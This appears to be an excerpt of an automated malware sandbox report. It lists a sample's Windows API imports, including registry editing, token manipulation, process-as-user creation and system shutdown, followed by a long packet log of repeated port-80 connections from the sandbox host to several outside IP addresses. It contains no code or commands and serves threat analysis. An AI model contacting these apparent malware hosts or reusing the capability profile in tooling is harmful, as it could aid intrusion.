ADVAPI32.dll | RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegCreateKeyExW, GetUserNameW, RegConnectRegistryW, CloseServiceHandle, UnlockServiceDatabase, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, InitializeSecurityDescriptor, InitializeAcl, GetLengthSid, CopySid, LogonUserW, LockServiceDatabase, GetTokenInformation, GetSecurityDescriptorDacl, GetAclInformation, GetAce, AddAce, SetSecurityDescriptorDacl, RegOpenKeyExW, RegQueryValueExW, AdjustTokenPrivileges, InitiateSystemShutdownExW, OpenSCManagerW, RegCloseKey
SHELL32.dll | DragQueryPoint, ShellExecuteExW, SHGetFolderPathW, DragQueryFileW, SHEmptyRecycleBinW, SHBrowseForFolderW, SHFileOperationW, SHGetPathFromIDListW, SHGetDesktopFolder, SHGetMalloc, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
ole32.dll | OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CLSIDFromString, StringFromGUID2, CoInitialize, CoUninitialize, CoCreateInstance, CreateStreamOnHGlobal, CoTaskMemAlloc, CoTaskMemFree, ProgIDFromCLSID, OleInitialize, CreateBindCtx, CLSIDFromProgID, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket, OleUninitialize, IIDFromString
OLEAUT32.dll | VariantChangeType, VariantCopyInd, DispCallFunc, CreateStdDispatch, CreateDispTypeInfo, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SysStringLen, SafeArrayAllocData, GetActiveObject, QueryPathOfRegTypeLib, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, SysAllocString, VariantCopy, VariantClear, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, OleLoadPicture, SafeArrayAccessData, VariantInit
Language of compilation system | Country where language is spoken
English | Great Britain
English | United States
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                                                    Oct 9, 2024 14:19:38.622492075 CEST4942380192.168.2.467.223.117.189
                                                                                                                    Oct 9, 2024 14:19:38.627408981 CEST804942367.223.117.189192.168.2.4
                                                                                                                    Oct 9, 2024 14:19:38.627506018 CEST4942380192.168.2.467.223.117.189
                                                                                                                    Oct 9, 2024 14:19:38.637706041 CEST4942380192.168.2.467.223.117.189
                                                                                                                    Oct 9, 2024 14:19:38.642679930 CEST804942367.223.117.189192.168.2.4
                                                                                                                    Oct 9, 2024 14:19:39.233439922 CEST804942367.223.117.189192.168.2.4
                                                                                                                    Oct 9, 2024 14:19:39.233467102 CEST804942367.223.117.189192.168.2.4
                                                                                                                    Oct 9, 2024 14:19:39.233479023 CEST804942367.223.117.189192.168.2.4
                                                                                                                    Oct 9, 2024 14:19:39.233489037 CEST804942367.223.117.189192.168.2.4
                                                                                                                    Oct 9, 2024 14:19:39.233500004 CEST804942367.223.117.189192.168.2.4
                                                                                                                    Oct 9, 2024 14:19:39.233510971 CEST804942367.223.117.189192.168.2.4
                                                                                                                    Oct 9, 2024 14:19:39.233521938 CEST804942367.223.117.189192.168.2.4
                                                                                                                    Oct 9, 2024 14:19:39.233537912 CEST4942380192.168.2.467.223.117.189
                                                                                                                    Oct 9, 2024 14:19:39.233582020 CEST4942380192.168.2.467.223.117.189
                                                                                                                    Oct 9, 2024 14:19:39.233618021 CEST804942367.223.117.189192.168.2.4
                                                                                                                    Oct 9, 2024 14:19:39.233628035 CEST804942367.223.117.189192.168.2.4
                                                                                                                    Oct 9, 2024 14:19:39.233639002 CEST804942367.223.117.189192.168.2.4
                                                                                                                    Oct 9, 2024 14:19:39.233661890 CEST4942380192.168.2.467.223.117.189
                                                                                                                    Oct 9, 2024 14:19:39.233679056 CEST4942380192.168.2.467.223.117.189
                                                                                                                    Oct 9, 2024 14:19:39.238456964 CEST804942367.223.117.189192.168.2.4
                                                                                                                    Oct 9, 2024 14:19:39.238545895 CEST804942367.223.117.189192.168.2.4
                                                                                                                    Oct 9, 2024 14:19:39.238598108 CEST4942380192.168.2.467.223.117.189
                                                                                                                    Oct 9, 2024 14:19:39.319575071 CEST804942367.223.117.189192.168.2.4
                                                                                                                    Oct 9, 2024 14:19:39.319628954 CEST804942367.223.117.189192.168.2.4
                                                                                                                    Oct 9, 2024 14:19:39.319645882 CEST804942367.223.117.189192.168.2.4
                                                                                                                    Oct 9, 2024 14:19:39.319673061 CEST804942367.223.117.189192.168.2.4
                                                                                                                    Oct 9, 2024 14:19:39.319684982 CEST804942367.223.117.189192.168.2.4
                                                                                                                    Oct 9, 2024 14:19:39.319700956 CEST4942380192.168.2.467.223.117.189
                                                                                                                    Oct 9, 2024 14:19:39.319732904 CEST4942380192.168.2.467.223.117.189
                                                                                                                    Oct 9, 2024 14:19:39.319992065 CEST804942367.223.117.189192.168.2.4
                                                                                                                    Oct 9, 2024 14:19:39.320004940 CEST804942367.223.117.189192.168.2.4
                                                                                                                    Oct 9, 2024 14:19:39.320014954 CEST804942367.223.117.189192.168.2.4
                                                                                                                    Oct 9, 2024 14:19:39.320034981 CEST4942380192.168.2.467.223.117.189
                                                                                                                    Oct 9, 2024 14:19:39.320066929 CEST4942380192.168.2.467.223.117.189
                                                                                                                    Oct 9, 2024 14:19:39.320369959 CEST804942367.223.117.189192.168.2.4
                                                                                                                    Oct 9, 2024 14:19:39.320382118 CEST804942367.223.117.189192.168.2.4
                                                                                                                    Oct 9, 2024 14:19:39.320394993 CEST804942367.223.117.189192.168.2.4
                                                                                                                    Oct 9, 2024 14:19:39.320413113 CEST4942380192.168.2.467.223.117.189
                                                                                                                    Oct 9, 2024 14:19:39.320414066 CEST804942367.223.117.189192.168.2.4
                                                                                                                    Oct 9, 2024 14:19:39.320425987 CEST804942367.223.117.189192.168.2.4
                                                                                                                    Oct 9, 2024 14:19:39.320477009 CEST4942380192.168.2.467.223.117.189
                                                                                                                    Oct 9, 2024 14:19:39.321228981 CEST804942367.223.117.189192.168.2.4
                                                                                                                    Oct 9, 2024 14:19:39.321242094 CEST804942367.223.117.189192.168.2.4
                                                                                                                    Oct 9, 2024 14:19:39.321255922 CEST804942367.223.117.189192.168.2.4
                                                                                                                    Oct 9, 2024 14:19:39.321271896 CEST4942380192.168.2.467.223.117.189
                                                                                                                    Oct 9, 2024 14:19:39.321316004 CEST4942380192.168.2.467.223.117.189
                                                                                                                    Oct 9, 2024 14:19:40.153156996 CEST4942380192.168.2.467.223.117.189
                                                                                                                    Oct 9, 2024 14:19:41.173296928 CEST4943780192.168.2.467.223.117.189
                                                                                                                    Oct 9, 2024 14:19:41.178262949 CEST804943767.223.117.189192.168.2.4
                                                                                                                    Oct 9, 2024 14:19:41.178333998 CEST4943780192.168.2.467.223.117.189
                                                                                                                    Oct 9, 2024 14:19:41.188683987 CEST4943780192.168.2.467.223.117.189
                                                                                                                    Oct 9, 2024 14:19:41.193856955 CEST804943767.223.117.189192.168.2.4
                                                                                                                    Oct 9, 2024 14:19:41.767956972 CEST804943767.223.117.189192.168.2.4
                                                                                                                    Oct 9, 2024 14:19:41.768027067 CEST804943767.223.117.189192.168.2.4
                                                                                                                    Oct 9, 2024 14:19:41.768064022 CEST804943767.223.117.189192.168.2.4
                                                                                                                    Oct 9, 2024 14:19:41.768076897 CEST4943780192.168.2.467.223.117.189
                                                                                                                    Oct 9, 2024 14:19:41.768121958 CEST804943767.223.117.189192.168.2.4
                                                                                                                    Oct 9, 2024 14:19:41.768173933 CEST804943767.223.117.189192.168.2.4
                                                                                                                    Oct 9, 2024 14:19:41.768177986 CEST4943780192.168.2.467.223.117.189
                                                                                                                    Oct 9, 2024 14:19:41.768210888 CEST804943767.223.117.189192.168.2.4
                                                                                                                    Oct 9, 2024 14:19:41.768240929 CEST804943767.223.117.189192.168.2.4
                                                                                                                    Oct 9, 2024 14:19:41.768254995 CEST4943780192.168.2.467.223.117.189
                                                                                                                    Oct 9, 2024 14:19:41.768275976 CEST804943767.223.117.189192.168.2.4
                                                                                                                    Oct 9, 2024 14:19:41.768312931 CEST804943767.223.117.189192.168.2.4
                                                                                                                    Oct 9, 2024 14:19:41.768317938 CEST4943780192.168.2.467.223.117.189
                                                                                                                    Oct 9, 2024 14:19:41.768348932 CEST804943767.223.117.189192.168.2.4
                                                                                                                    Oct 9, 2024 14:19:41.768387079 CEST4943780192.168.2.467.223.117.189
                                                                                                                    Oct 9, 2024 14:19:41.773272991 CEST804943767.223.117.189192.168.2.4
                                                                                                                    Oct 9, 2024 14:19:41.773384094 CEST804943767.223.117.189192.168.2.4
                                                                                                                    Oct 9, 2024 14:19:41.773416996 CEST804943767.223.117.189192.168.2.4
                                                                                                                    Oct 9, 2024 14:19:41.773439884 CEST4943780192.168.2.467.223.117.189
                                                                                                                    Oct 9, 2024 14:19:41.773454905 CEST804943767.223.117.189192.168.2.4
                                                                                                                    Oct 9, 2024 14:19:41.773493052 CEST4943780192.168.2.467.223.117.189
                                                                                                                    Oct 9, 2024 14:19:41.861059904 CEST804943767.223.117.189192.168.2.4
                                                                                                                    Oct 9, 2024 14:19:41.861140013 CEST804943767.223.117.189192.168.2.4
                                                                                                                    Oct 9, 2024 14:19:41.861154079 CEST804943767.223.117.189192.168.2.4
                                                                                                                    Oct 9, 2024 14:19:41.861166954 CEST804943767.223.117.189192.168.2.4
                                                                                                                    Oct 9, 2024 14:19:41.861208916 CEST4943780192.168.2.467.223.117.189
                                                                                                                    Oct 9, 2024 14:19:41.861239910 CEST4943780192.168.2.467.223.117.189
                                                                                                                    Oct 9, 2024 14:19:41.861381054 CEST804943767.223.117.189192.168.2.4
                                                                                                                    Oct 9, 2024 14:19:41.861393929 CEST804943767.223.117.189192.168.2.4
                                                                                                                    Oct 9, 2024 14:19:41.861406088 CEST804943767.223.117.189192.168.2.4
                                                                                                                    Oct 9, 2024 14:19:41.861447096 CEST4943780192.168.2.467.223.117.189
                                                                                                                    Oct 9, 2024 14:19:41.861466885 CEST804943767.223.117.189192.168.2.4
                                                                                                                    Oct 9, 2024 14:19:41.861479998 CEST804943767.223.117.189192.168.2.4
                                                                                                                    Oct 9, 2024 14:19:41.861494064 CEST804943767.223.117.189192.168.2.4
                                                                                                                    Oct 9, 2024 14:19:41.861510992 CEST4943780192.168.2.467.223.117.189
                                                                                                                    Oct 9, 2024 14:19:41.861543894 CEST4943780192.168.2.467.223.117.189
                                                                                                                    Oct 9, 2024 14:19:41.863460064 CEST804943767.223.117.189192.168.2.4
                                                                                                                    Oct 9, 2024 14:19:41.863522053 CEST804943767.223.117.189192.168.2.4
                                                                                                                    Oct 9, 2024 14:19:41.863533974 CEST804943767.223.117.189192.168.2.4
                                                                                                                    Oct 9, 2024 14:19:41.863565922 CEST4943780192.168.2.467.223.117.189
                                                                                                                    Oct 9, 2024 14:19:41.863617897 CEST804943767.223.117.189192.168.2.4
                                                                                                                    Oct 9, 2024 14:19:41.863631010 CEST804943767.223.117.189192.168.2.4
                                                                                                                    Oct 9, 2024 14:19:41.863658905 CEST4943780192.168.2.467.223.117.189
                                                                                                                    Oct 9, 2024 14:19:41.863864899 CEST804943767.223.117.189192.168.2.4
                                                                                                                    Oct 9, 2024 14:19:41.863913059 CEST4943780192.168.2.467.223.117.189
                                                                                                                    Oct 9, 2024 14:19:42.700156927 CEST4943780192.168.2.467.223.117.189
                                                                                                                    Oct 9, 2024 14:19:43.718849897 CEST4945480192.168.2.467.223.117.189
                                                                                                                    Oct 9, 2024 14:19:43.723881006 CEST804945467.223.117.189192.168.2.4
                                                                                                                    Oct 9, 2024 14:19:43.726871014 CEST4945480192.168.2.467.223.117.189
                                                                                                                    Oct 9, 2024 14:19:43.738126993 CEST4945480192.168.2.467.223.117.189
                                                                                                                    Oct 9, 2024 14:19:43.743196964 CEST804945467.223.117.189192.168.2.4
                                                                                                                    Oct 9, 2024 14:19:43.743215084 CEST804945467.223.117.189192.168.2.4
                                                                                                                    Oct 9, 2024 14:19:43.743228912 CEST804945467.223.117.189192.168.2.4
                                                                                                                    Oct 9, 2024 14:19:43.743278980 CEST804945467.223.117.189192.168.2.4
                                                                                                                    Oct 9, 2024 14:19:43.743288040 CEST804945467.223.117.189192.168.2.4
                                                                                                                    Oct 9, 2024 14:19:43.743298054 CEST804945467.223.117.189192.168.2.4
                                                                                                                    Oct 9, 2024 14:19:43.743360996 CEST804945467.223.117.189192.168.2.4
                                                                                                                    Oct 9, 2024 14:19:43.743371010 CEST804945467.223.117.189192.168.2.4
                                                                                                                    Oct 9, 2024 14:19:43.743380070 CEST804945467.223.117.189192.168.2.4
                                                                                                                    Oct 9, 2024 14:19:44.427808046 CEST804945467.223.117.189192.168.2.4
                                                                                                                    Oct 9, 2024 14:19:44.427834034 CEST804945467.223.117.189192.168.2.4
                                                                                                                    Oct 9, 2024 14:19:44.427844048 CEST804945467.223.117.189192.168.2.4
                                                                                                                    Oct 9, 2024 14:19:44.427932024 CEST4945480192.168.2.467.223.117.189
                                                                                                                    Oct 9, 2024 14:19:44.427983046 CEST804945467.223.117.189192.168.2.4
                                                                                                                    Oct 9, 2024 14:19:44.427993059 CEST804945467.223.117.189192.168.2.4
                                                                                                                    Oct 9, 2024 14:19:44.427999020 CEST804945467.223.117.189192.168.2.4
                                                                                                                    Oct 9, 2024 14:19:44.428009033 CEST804945467.223.117.189192.168.2.4
                                                                                                                    Oct 9, 2024 14:19:44.428021908 CEST804945467.223.117.189192.168.2.4
                                                                                                                    Oct 9, 2024 14:19:44.428030014 CEST4945480192.168.2.467.223.117.189
                                                                                                                    Oct 9, 2024 14:19:44.428046942 CEST4945480192.168.2.467.223.117.189
                                                                                                                    Oct 9, 2024 14:19:44.428065062 CEST4945480192.168.2.467.223.117.189
                                                                                                                    Oct 9, 2024 14:19:44.428282022 CEST804945467.223.117.189192.168.2.4
                                                                                                                    Oct 9, 2024 14:19:44.428350925 CEST804945467.223.117.189192.168.2.4
                                                                                                                    Oct 9, 2024 14:19:44.431519032 CEST4945480192.168.2.467.223.117.189
                                                                                                                    Oct 9, 2024 14:19:44.432768106 CEST804945467.223.117.189192.168.2.4
                                                                                                                    Oct 9, 2024 14:19:44.432809114 CEST804945467.223.117.189192.168.2.4
                                                                                                                    Oct 9, 2024 14:19:44.432818890 CEST804945467.223.117.189192.168.2.4
                                                                                                                    Oct 9, 2024 14:19:44.432849884 CEST4945480192.168.2.467.223.117.189
                                                                                                                    Oct 9, 2024 14:19:44.481235981 CEST4945480192.168.2.467.223.117.189
                                                                                                                    Oct 9, 2024 14:19:44.529742956 CEST804945467.223.117.189192.168.2.4
                                                                                                                    Oct 9, 2024 14:19:44.529931068 CEST804945467.223.117.189192.168.2.4
                                                                                                                    Oct 9, 2024 14:19:44.529946089 CEST804945467.223.117.189192.168.2.4
                                                                                                                    Oct 9, 2024 14:19:44.529958963 CEST804945467.223.117.189192.168.2.4
                                                                                                                    Oct 9, 2024 14:19:44.529977083 CEST4945480192.168.2.467.223.117.189
                                                                                                                    Oct 9, 2024 14:19:44.530000925 CEST4945480192.168.2.467.223.117.189
                                                                                                                    Oct 9, 2024 14:19:44.530041933 CEST804945467.223.117.189192.168.2.4
                                                                                                                    Oct 9, 2024 14:19:44.530086994 CEST804945467.223.117.189192.168.2.4
                                                                                                                    Oct 9, 2024 14:19:44.530098915 CEST804945467.223.117.189192.168.2.4
                                                                                                                    Oct 9, 2024 14:19:44.530128956 CEST4945480192.168.2.467.223.117.189
                                                                                                                    Oct 9, 2024 14:19:44.530155897 CEST804945467.223.117.189192.168.2.4
                                                                                                                    Oct 9, 2024 14:19:44.530190945 CEST4945480192.168.2.467.223.117.189
                                                                                                                    Oct 9, 2024 14:19:44.530719995 CEST804945467.223.117.189192.168.2.4
                                                                                                                    Oct 9, 2024 14:19:44.530788898 CEST804945467.223.117.189192.168.2.4
                                                                                                                    Oct 9, 2024 14:19:44.530800104 CEST804945467.223.117.189192.168.2.4
                                                                                                                    Oct 9, 2024 14:19:44.530812979 CEST804945467.223.117.189192.168.2.4
                                                                                                                    Oct 9, 2024 14:19:44.530833960 CEST4945480192.168.2.467.223.117.189
                                                                                                                    Oct 9, 2024 14:19:44.530864954 CEST4945480192.168.2.467.223.117.189
                                                                                                                    Oct 9, 2024 14:19:44.530905962 CEST804945467.223.117.189192.168.2.4
                                                                                                                    Oct 9, 2024 14:19:44.531685114 CEST804945467.223.117.189192.168.2.4
                                                                                                                    Oct 9, 2024 14:19:44.531707048 CEST804945467.223.117.189192.168.2.4
                                                                                                                    Oct 9, 2024 14:20:34.181499004 CEST804963838.47.232.196192.168.2.4
                                                                                                                    Oct 9, 2024 14:20:35.111148119 CEST804963838.47.232.196192.168.2.4
                                                                                                                    Oct 9, 2024 14:20:35.247466087 CEST4963880192.168.2.438.47.232.196
                                                                                                                    Oct 9, 2024 14:20:35.346286058 CEST804963838.47.232.196192.168.2.4
                                                                                                                    Oct 9, 2024 14:20:35.346378088 CEST4963880192.168.2.438.47.232.196
                                                                                                                    Oct 9, 2024 14:20:35.685029030 CEST4963880192.168.2.438.47.232.196
                                                                                                                    Oct 9, 2024 14:20:36.703955889 CEST4963980192.168.2.438.47.232.196
                                                                                                                    Oct 9, 2024 14:20:36.709017038 CEST804963938.47.232.196192.168.2.4
                                                                                                                    Oct 9, 2024 14:20:36.709098101 CEST4963980192.168.2.438.47.232.196
                                                                                                                    Oct 9, 2024 14:20:36.716541052 CEST4963980192.168.2.438.47.232.196
                                                                                                                    Oct 9, 2024 14:20:36.721477985 CEST804963938.47.232.196192.168.2.4
                                                                                                                    Oct 9, 2024 14:20:37.626393080 CEST804963938.47.232.196192.168.2.4
                                                                                                                    Oct 9, 2024 14:20:37.626429081 CEST804963938.47.232.196192.168.2.4
                                                                                                                    Oct 9, 2024 14:20:37.626584053 CEST4963980192.168.2.438.47.232.196
                                                                                                                    Oct 9, 2024 14:20:37.630944967 CEST4963980192.168.2.438.47.232.196
                                                                                                                    Oct 9, 2024 14:20:37.635782957 CEST804963938.47.232.196192.168.2.4
                                                                                                                    Oct 9, 2024 14:20:42.661211967 CEST4964080192.168.2.43.33.130.190
                                                                                                                    Oct 9, 2024 14:20:42.666053057 CEST80496403.33.130.190192.168.2.4
                                                                                                                    Oct 9, 2024 14:20:42.668899059 CEST4964080192.168.2.43.33.130.190
                                                                                                                    Oct 9, 2024 14:20:42.678286076 CEST4964080192.168.2.43.33.130.190
                                                                                                                    Oct 9, 2024 14:20:42.683131933 CEST80496403.33.130.190192.168.2.4
                                                                                                                    Oct 9, 2024 14:20:44.062542915 CEST80496403.33.130.190192.168.2.4
                                                                                                                    Oct 9, 2024 14:20:44.064387083 CEST4964080192.168.2.43.33.130.190
                                                                                                                    Oct 9, 2024 14:20:44.186249971 CEST4964080192.168.2.43.33.130.190
                                                                                                                    Oct 9, 2024 14:20:44.191219091 CEST80496403.33.130.190192.168.2.4
                                                                                                                    Oct 9, 2024 14:20:45.204633951 CEST4964180192.168.2.43.33.130.190
                                                                                                                    Oct 9, 2024 14:20:45.209728003 CEST80496413.33.130.190192.168.2.4
                                                                                                                    Oct 9, 2024 14:20:45.209803104 CEST4964180192.168.2.43.33.130.190
                                                                                                                    Oct 9, 2024 14:20:45.223704100 CEST4964180192.168.2.43.33.130.190
                                                                                                                    Oct 9, 2024 14:20:45.228794098 CEST80496413.33.130.190192.168.2.4
                                                                                                                    Oct 9, 2024 14:20:45.667924881 CEST80496413.33.130.190192.168.2.4
                                                                                                                    Oct 9, 2024 14:20:45.667999029 CEST4964180192.168.2.43.33.130.190
                                                                                                                    Oct 9, 2024 14:20:46.732018948 CEST4964180192.168.2.43.33.130.190
                                                                                                                    Oct 9, 2024 14:20:46.737835884 CEST80496413.33.130.190192.168.2.4
                                                                                                                    Oct 9, 2024 14:20:47.751686096 CEST4964280192.168.2.43.33.130.190
                                                                                                                    Oct 9, 2024 14:20:47.756813049 CEST80496423.33.130.190192.168.2.4
                                                                                                                    Oct 9, 2024 14:20:47.756941080 CEST4964280192.168.2.43.33.130.190
                                                                                                                    Oct 9, 2024 14:20:47.767743111 CEST4964280192.168.2.43.33.130.190
                                                                                                                    Oct 9, 2024 14:20:47.772649050 CEST80496423.33.130.190192.168.2.4
                                                                                                                    Oct 9, 2024 14:20:47.772658110 CEST80496423.33.130.190192.168.2.4
                                                                                                                    Oct 9, 2024 14:20:47.772665024 CEST80496423.33.130.190192.168.2.4
                                                                                                                    Oct 9, 2024 14:20:47.772672892 CEST80496423.33.130.190192.168.2.4
                                                                                                                    Oct 9, 2024 14:20:47.772684097 CEST80496423.33.130.190192.168.2.4
                                                                                                                    Oct 9, 2024 14:20:47.772804022 CEST80496423.33.130.190192.168.2.4
                                                                                                                    Oct 9, 2024 14:20:47.772813082 CEST80496423.33.130.190192.168.2.4
                                                                                                                    Oct 9, 2024 14:20:47.773085117 CEST80496423.33.130.190192.168.2.4
                                                                                                                    Oct 9, 2024 14:20:47.773154020 CEST80496423.33.130.190192.168.2.4
                                                                                                                    Oct 9, 2024 14:20:48.225477934 CEST80496423.33.130.190192.168.2.4
                                                                                                                    Oct 9, 2024 14:20:48.225837946 CEST4964280192.168.2.43.33.130.190
                                                                                                                    Oct 9, 2024 14:20:49.278945923 CEST4964280192.168.2.43.33.130.190
                                                                                                                    Oct 9, 2024 14:20:49.284147978 CEST80496423.33.130.190192.168.2.4
                                                                                                                    Oct 9, 2024 14:20:50.297800064 CEST4964380192.168.2.43.33.130.190
                                                                                                                    Oct 9, 2024 14:20:50.304395914 CEST80496433.33.130.190192.168.2.4
                                                                                                                    Oct 9, 2024 14:20:50.304636955 CEST4964380192.168.2.43.33.130.190
                                                                                                                    Oct 9, 2024 14:20:50.311779976 CEST4964380192.168.2.43.33.130.190
                                                                                                                    Oct 9, 2024 14:20:50.319334984 CEST80496433.33.130.190192.168.2.4
                                                                                                                    Oct 9, 2024 14:20:51.716342926 CEST80496433.33.130.190192.168.2.4
                                                                                                                    Oct 9, 2024 14:20:51.716567039 CEST80496433.33.130.190192.168.2.4
                                                                                                                    Oct 9, 2024 14:20:51.716612101 CEST4964380192.168.2.43.33.130.190
                                                                                                                    Oct 9, 2024 14:20:51.719866991 CEST4964380192.168.2.43.33.130.190
                                                                                                                    Oct 9, 2024 14:20:51.725038052 CEST80496433.33.130.190192.168.2.4
                                                                                                                    Oct 9, 2024 14:20:57.199383020 CEST4964480192.168.2.4154.212.219.2
                                                                                                                    Oct 9, 2024 14:20:57.204314947 CEST8049644154.212.219.2192.168.2.4
                                                                                                                    Oct 9, 2024 14:20:57.204392910 CEST4964480192.168.2.4154.212.219.2
                                                                                                                    Oct 9, 2024 14:20:57.223153114 CEST4964480192.168.2.4154.212.219.2
                                                                                                                    Oct 9, 2024 14:20:57.228148937 CEST8049644154.212.219.2192.168.2.4
                                                                                                                    Oct 9, 2024 14:20:58.129436016 CEST8049644154.212.219.2192.168.2.4
                                                                                                                    Oct 9, 2024 14:20:58.129606962 CEST8049644154.212.219.2192.168.2.4
                                                                                                                    Oct 9, 2024 14:20:58.129652023 CEST4964480192.168.2.4154.212.219.2
                                                                                                                    Oct 9, 2024 14:20:58.733570099 CEST4964480192.168.2.4154.212.219.2
                                                                                                                    Oct 9, 2024 14:20:59.752250910 CEST4964580192.168.2.4154.212.219.2
                                                                                                                    Oct 9, 2024 14:20:59.757410049 CEST8049645154.212.219.2192.168.2.4
                                                                                                                    Oct 9, 2024 14:20:59.758405924 CEST4964580192.168.2.4154.212.219.2
                                                                                                                    Oct 9, 2024 14:20:59.772252083 CEST4964580192.168.2.4154.212.219.2
                                                                                                                    Oct 9, 2024 14:20:59.777250051 CEST8049645154.212.219.2192.168.2.4
                                                                                                                    Oct 9, 2024 14:21:00.661510944 CEST8049645154.212.219.2192.168.2.4
                                                                                                                    Oct 9, 2024 14:21:00.661709070 CEST8049645154.212.219.2192.168.2.4
                                                                                                                    Oct 9, 2024 14:21:00.661952972 CEST4964580192.168.2.4154.212.219.2
                                                                                                                    Oct 9, 2024 14:21:01.279148102 CEST4964580192.168.2.4154.212.219.2
                                                                                                                    Oct 9, 2024 14:21:02.299268961 CEST4964680192.168.2.4154.212.219.2
                                                                                                                    Oct 9, 2024 14:21:02.304577112 CEST8049646154.212.219.2192.168.2.4
                                                                                                                    Oct 9, 2024 14:21:02.304760933 CEST4964680192.168.2.4154.212.219.2
                                                                                                                    Oct 9, 2024 14:21:02.316055059 CEST4964680192.168.2.4154.212.219.2
                                                                                                                    Oct 9, 2024 14:21:02.321021080 CEST8049646154.212.219.2192.168.2.4
                                                                                                                    Oct 9, 2024 14:21:02.321032047 CEST8049646154.212.219.2192.168.2.4
                                                                                                                    Oct 9, 2024 14:21:02.321085930 CEST8049646154.212.219.2192.168.2.4
                                                                                                                    Oct 9, 2024 14:21:02.321095943 CEST8049646154.212.219.2192.168.2.4
                                                                                                                    Oct 9, 2024 14:21:02.321192026 CEST8049646154.212.219.2192.168.2.4
                                                                                                                    Oct 9, 2024 14:21:02.321202040 CEST8049646154.212.219.2192.168.2.4
                                                                                                                    Oct 9, 2024 14:21:02.321218967 CEST8049646154.212.219.2192.168.2.4
                                                                                                                    Oct 9, 2024 14:21:02.321228981 CEST8049646154.212.219.2192.168.2.4
                                                                                                                    Oct 9, 2024 14:21:02.321240902 CEST8049646154.212.219.2192.168.2.4
                                                                                                                    Oct 9, 2024 14:21:03.191891909 CEST8049646154.212.219.2192.168.2.4
                                                                                                                    Oct 9, 2024 14:21:03.232230902 CEST4964680192.168.2.4154.212.219.2
                                                                                                                    Oct 9, 2024 14:21:03.408185959 CEST8049646154.212.219.2192.168.2.4
                                                                                                                    Oct 9, 2024 14:21:03.408303976 CEST4964680192.168.2.4154.212.219.2
                                                                                                                    Oct 9, 2024 14:21:03.828309059 CEST4964680192.168.2.4154.212.219.2
                                                                                                                    Oct 9, 2024 14:21:04.845113039 CEST4964780192.168.2.4154.212.219.2
                                                                                                                    Oct 9, 2024 14:21:04.851684093 CEST8049647154.212.219.2192.168.2.4
                                                                                                                    Oct 9, 2024 14:21:04.851758957 CEST4964780192.168.2.4154.212.219.2
                                                                                                                    Oct 9, 2024 14:21:04.859318018 CEST4964780192.168.2.4154.212.219.2
                                                                                                                    Oct 9, 2024 14:21:04.864217043 CEST8049647154.212.219.2192.168.2.4
                                                                                                                    Oct 9, 2024 14:21:05.895066977 CEST8049647154.212.219.2192.168.2.4
                                                                                                                    Oct 9, 2024 14:21:05.895086050 CEST8049647154.212.219.2192.168.2.4
                                                                                                                    Oct 9, 2024 14:21:05.895095110 CEST8049647154.212.219.2192.168.2.4
                                                                                                                    Oct 9, 2024 14:21:05.903310061 CEST4964780192.168.2.4154.212.219.2
                                                                                                                    Oct 9, 2024 14:21:05.903310061 CEST4964780192.168.2.4154.212.219.2
                                                                                                                    Oct 9, 2024 14:21:05.908338070 CEST8049647154.212.219.2192.168.2.4
                                                                                                                    Oct 9, 2024 14:21:12.206510067 CEST4964880192.168.2.4133.130.35.90
                                                                                                                    Oct 9, 2024 14:21:12.211406946 CEST8049648133.130.35.90192.168.2.4
                                                                                                                    Oct 9, 2024 14:21:12.214569092 CEST4964880192.168.2.4133.130.35.90
                                                                                                                    Oct 9, 2024 14:21:12.227118969 CEST4964880192.168.2.4133.130.35.90
                                                                                                                    Oct 9, 2024 14:21:12.231987000 CEST8049648133.130.35.90192.168.2.4
                                                                                                                    Oct 9, 2024 14:21:13.023412943 CEST8049648133.130.35.90192.168.2.4
                                                                                                                    Oct 9, 2024 14:21:13.023653984 CEST8049648133.130.35.90192.168.2.4
                                                                                                                    Oct 9, 2024 14:21:13.023710966 CEST4964880192.168.2.4133.130.35.90
                                                                                                                    Oct 9, 2024 14:21:13.732479095 CEST4964880192.168.2.4133.130.35.90
                                                                                                                    Oct 9, 2024 14:21:14.752407074 CEST4964980192.168.2.4133.130.35.90
                                                                                                                    Oct 9, 2024 14:21:14.757658005 CEST8049649133.130.35.90192.168.2.4
                                                                                                                    Oct 9, 2024 14:21:14.757853985 CEST4964980192.168.2.4133.130.35.90
                                                                                                                    Oct 9, 2024 14:21:14.768416882 CEST4964980192.168.2.4133.130.35.90
                                                                                                                    Oct 9, 2024 14:21:14.773420095 CEST8049649133.130.35.90192.168.2.4
                                                                                                                    Oct 9, 2024 14:21:15.543420076 CEST8049649133.130.35.90192.168.2.4
                                                                                                                    Oct 9, 2024 14:21:15.543644905 CEST8049649133.130.35.90192.168.2.4
                                                                                                                    Oct 9, 2024 14:21:15.543693066 CEST4964980192.168.2.4133.130.35.90
                                                                                                                    Oct 9, 2024 14:21:16.279252052 CEST4964980192.168.2.4133.130.35.90
                                                                                                                    Oct 9, 2024 14:21:17.298496962 CEST4965080192.168.2.4133.130.35.90
                                                                                                                    Oct 9, 2024 14:21:17.305649996 CEST8049650133.130.35.90192.168.2.4
                                                                                                                    Oct 9, 2024 14:21:17.305742979 CEST4965080192.168.2.4133.130.35.90
                                                                                                                    Oct 9, 2024 14:21:17.319358110 CEST4965080192.168.2.4133.130.35.90
                                                                                                                    Oct 9, 2024 14:21:17.326783895 CEST8049650133.130.35.90192.168.2.4
                                                                                                                    Oct 9, 2024 14:21:17.326796055 CEST8049650133.130.35.90192.168.2.4
                                                                                                                    Oct 9, 2024 14:21:17.326806068 CEST8049650133.130.35.90192.168.2.4
                                                                                                                    Oct 9, 2024 14:21:17.327029943 CEST8049650133.130.35.90192.168.2.4
                                                                                                                    Oct 9, 2024 14:21:17.327332020 CEST8049650133.130.35.90192.168.2.4
                                                                                                                    Oct 9, 2024 14:21:17.328470945 CEST8049650133.130.35.90192.168.2.4
